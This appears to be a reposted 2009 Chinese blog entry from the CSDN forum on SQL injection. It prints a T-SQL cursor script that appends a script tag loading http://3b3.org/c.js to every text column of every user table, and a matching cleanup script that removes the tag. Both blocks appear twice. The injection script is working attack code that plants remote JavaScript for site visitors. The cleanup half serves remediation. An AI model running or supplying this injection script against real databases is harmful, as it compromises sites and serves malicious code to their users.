SQL注入 源自CSDN论坛
2009-04-28 16:03
267 查看
注入操作:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
消除注入操作:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=replace(['+@C+'],''<script src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<script src=http://3b3.org/c.js></script>''')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
消除注入操作:
Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
Exec('update ['+@T+'] Set ['+@C+']=replace(['+@C+'],''<script src=http://3b3.org/c.js></script>'','''')')
Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor
相关文章推荐
- 能力测试III(题目源自于CSDN论坛)
- 数据库能力测试I(题目源自于CSDN论坛)
- 一个极其简单的防止SQL注入的办法(只针对部分有效)转自csdn论坛
- 能力测试II(源自于CSDN论坛)
- 能力测试I(题目源自于CSDN论坛)
- 吐血总结关于找工作的20条经验(转自csdn论坛)
- CSDN 论坛板块升级规则
- 终于明白,原来不一定一定要搞论坛才能交流和学习!CSDN,THANK-U!
- Spring2.0中文参考手册(中文版) [转自CSDN论坛]
- 献给开发者的大礼--打造CSDN论坛专用阅读器(webbrowser c# vs2005 自动提交表单)
- 有点郁闷,csdn论坛里面关于uml方面没有专门的栏目
- CSDN:您的帐户被限制发帖,如有疑问请联系版主或论坛管理员。
- 蛙蛙推荐:大文件上传问题,整理自csdn论坛
- IPB论坛1.3.1及更低版本SQL注入漏洞
- 在csdn论坛发帖子问“算法重要吗”得到的回答
- csdn 论坛技术区平均给分功能
- 使用ClientSocket控件实现CSDN论坛帖子的自动回复(修改)
- 九九乘法表 只用一个变量神面试题 (收集整理转自CSDN论坛)
- (转)走出MFC子类化的迷宫:子类化,SUBCLASSWINDOW ,MFC消息机制 ---(摘自CSDN论坛)